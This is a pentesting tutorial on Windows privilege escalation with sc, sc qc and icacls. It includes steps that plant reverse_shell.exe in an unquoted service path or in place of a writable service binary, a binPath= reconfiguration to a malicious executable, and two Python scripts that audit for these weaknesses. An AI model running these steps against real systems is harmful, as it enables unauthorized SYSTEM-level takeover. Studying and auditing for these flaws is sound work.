Exploring sc, sc qc, and icacls for Privilege Escalation on Windows
When you land on a Windows machine as a low-privileged user, your next job is to enumerate the environment mercilessly. You want to find services you can hijack, permissions you can abuse, and binaries that’ll help you escalate to SYSTEM. This is where commands like sc, sc qc, and icacls come in.
Let’s break these down and walk through how they’re used by real pentesters in the field.
sc – The Service Control Manager’s Best Friend
sc is a command-line utility that communicates with the Service Control Manager. It allows you to interact with Windows services — start, stop, configure, create, delete.
Key Syntax:
sc query <service_name>
sc qc <service_name>
sc config <service_name> binPath= "C:\path\to\malicious.exe"
Pro tip: Always leave a space after binPath= or the command will fail silently.
sc qc – Query Service Configuration
This is where the gold often hides. sc qc dumps the configuration of a specific service, showing the executable path, account used to run the service, and more.
Example:
sc qc SomeService
Output:
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SomeService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\SomeApp\app.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Some Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
What to Look For:
- BINARY_PATH_NAME: Is it pointing to a non-quoted path with spaces? That could be exploited via Unquoted Service Path.
- SERVICE_START_NAME: If it runs as LocalSystem and you can change the binary or restart the service — jackpot.
Example Use Case – Hijacking an Unquoted Service Path
Suppose BINARY_PATH_NAME is:
C:\Program Files\Some App\app.exe
If the path isn’t quoted, Windows tries each space-separated prefix as an executable before reaching the real one (C:\Program.exe, then C:\Program Files\Some.exe). So if you, as a low-priv user, can create C:\Program Files\Some.exe (i.e. you can write to C:\Program Files), Windows might run your binary first.
Steps:
copy reverse_shell.exe "C:\Program Files\Some.exe"
net stop SomeService
net start SomeService
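As an added example (not code from the original post), the following Python script parses sc qc output and works out which intermediate executables Windows would try for an unquoted image path, so an auditor can point icacls at those directories and confirm standard users cannot write there. The sample dump is constructed to mirror the listing above, with the "Some App" path from the use case so the check has something to report.

```python
import re

# Constructed sample: an `sc qc` dump in the shape shown in the post,
# using the unquoted "Some App" path from the use case.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SomeService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Some App\app.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Some Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"\s*([A-Z_]+)\s*:\s?(.*)$")


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value (empty string if blank)."""
    cfg = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def unquoted_path_candidates(binary_path):
    """
    For an unquoted image path containing spaces, return the executables
    Windows may try before the real one (each prefix ending at a space,
    with .exe appended). A quoted or space-free path returns [].
    """
    p = binary_path.strip()
    if not p or p.startswith('"'):
        return []
    # Keep only the part up to the first .exe so service arguments
    # (e.g. "app.exe -service") do not produce bogus candidates.
    m = re.search(r"\.exe", p, re.IGNORECASE)
    exe = p[: m.end()] if m else p
    if " " not in exe:
        return []
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_service(sc_qc_text):
    """
    Summarise one service for review: the directories that must not be
    writable by standard users, and whether the service runs as SYSTEM
    (the case where a replaced binary matters most).
    """
    cfg = parse_sc_qc(sc_qc_text)
    account = cfg.get("SERVICE_START_NAME", "")
    path = cfg.get("BINARY_PATH_NAME", "")
    return {
        "service": cfg.get("SERVICE_NAME", ""),
        "binary_path": path,
        "runs_as_system": account.lower() in ("localsystem", r"nt authority\system"),
        "paths_to_check": unquoted_path_candidates(path),
    }


if __name__ == "__main__":
    for key, value in audit_service(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```

Each entry in paths_to_check names a file that must not be creatable by a low-privileged account; checking the parent directory of each with icacls is the corresponding defensive step.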
icacls – Your ACL (Access Control List) Inspector
icacls is a powerful command-line tool to view and modify NTFS permissions. Use it to check:
- If you have write access to service executables
- If you can write to configuration files, script files, or folders used by services
Basic Usage:
icacls "C:\Program Files\Some App"
Output Example:
BUILTIN\Users:(OI)(CI)(RX)
BUILTIN\Administrators:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
Everyone:(OI)(CI)(M)
What to Look For:
(M) = Modify, (F) = Full control, (RX) = Read and execute. (OI) and (CI) mean the entry is inherited by child files and child folders respectively.
If Users or Everyone has Modify or Full Control, and the path is part of a running service or loaded binary, you might be able to replace or edit it.
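As an added example (not code from the original post), this Python parser reads icacls output and flags entries that give write-class access to principals every standard user belongs to, which is the check described above written as a reusable audit. The sample listing is constructed in the shape icacls prints (queried path on the first line, remaining entries indented); the principal list and the set of rights treated as "write" are assumptions stated in the code.

```python
import re

# Constructed sample in the shape icacls prints: the queried path on the
# first line followed by the first ACE, the remaining ACEs indented.
SAMPLE_ICACLS = r"""C:\Program Files\Some App BUILTIN\Users:(OI)(CI)(RX)
                          BUILTIN\Administrators:(OI)(CI)(F)
                          NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                          Everyone:(OI)(CI)(M)

Successfully processed 1 files; Failed processing 0 files
"""

# principal:(flag)(flag)... ; principals never contain a colon.
ACE_RE = re.compile(r"^\s*(.+?):((?:\([^)]*\))+)\s*$")

# Simple rights that allow replacing or editing the object.
WRITE_RIGHTS = {"F", "M", "W"}
# Specific rights (icacls prints them as a comma list, e.g. (RX,W) or
# (DE,WD,AD)) that amount to the same thing, including the ability to
# rewrite the ACL or take ownership. Assumed set for this audit.
WRITE_SPECIFIC = {"WD", "AD", "WA", "WEA", "DE", "DC", "WDAC", "WO"}

# Principals that any authenticated or interactive user falls under (assumed list).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}


def parse_icacls(text, queried_path):
    """Return a list of (principal, [flags]) tuples from icacls output."""
    aces = []
    for line in text.splitlines():
        # icacls prefixes the first ACE with the path that was queried.
        if line.startswith(queried_path):
            line = line[len(queried_path):]
        m = ACE_RE.match(line)
        if not m:
            continue
        principal = m.group(1).strip()
        flags = re.findall(r"\(([^)]*)\)", m.group(2))
        aces.append((principal, flags))
    return aces


def grants_write(flags):
    """True if the ACE's rights allow modifying the object."""
    for f in flags:
        for right in f.split(","):
            right = right.strip()
            if right in WRITE_RIGHTS or right in WRITE_SPECIFIC:
                return True
    return False


def weak_aces(text, queried_path):
    """ACEs giving write-class access to low-privileged principals (deny entries skipped)."""
    weak = []
    for principal, flags in parse_icacls(text, queried_path):
        if "DENY" in flags:
            continue
        if principal.lower() in LOW_PRIV_PRINCIPALS and grants_write(flags):
            weak.append((principal, flags))
    return weak


if __name__ == "__main__":
    for principal, flags in weak_aces(SAMPLE_ICACLS, r"C:\Program Files\Some App"):
        print(f"weak ACE: {principal} {''.join(f'({f})' for f in flags)}")
```

On the sample above the only finding is Everyone with (OI)(CI)(M); the BUILTIN\Users entry is read and execute only, which is the expected state for a service directory.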
Combined Workflow
Here’s how you might chain these tools together:
- Enumerate services
sc query type= service state= all
- Investigate each service
sc qc <service_name>
- Check permissions on the binary path
icacls "C:\Path\To\Binary.exe"
- Check directory permissions too
icacls "C:\Path\To\"
- Exploit if write access is found and service is restartable
sc stop <service_name>
copy reverse_shell.exe "C:\Path\To\Binary.exe"
sc start <service_name>
PrivEsc Pitfalls to Avoid
- You must be able to restart the service — otherwise you’ll need a reboot or some other trigger that restarts it.
- If the service is “critical” and crashes, expect the blue screen of regret.
- Don’t forget AV — dropping payloads in C:\Program Files\ often triggers alarms.
TL;DR – Pentester Cheat Sheet
| Command | Purpose |
|---|---|
| sc qc name | View full service config |
| sc config | Modify a service (needs privs) |
| sc start/stop | Control service execution |
| icacls path | View NTFS permissions |
| icacls path /grant | Modify permissions (if allowed) |
Final Notes
These commands are basic, but they uncover a surprising amount of privilege escalation vectors — especially in misconfigured enterprise environments. Don’t underestimate the power of a wrongly set permission or a poorly quoted service path.
Keep them in your toolkit. Abuse them wisely.
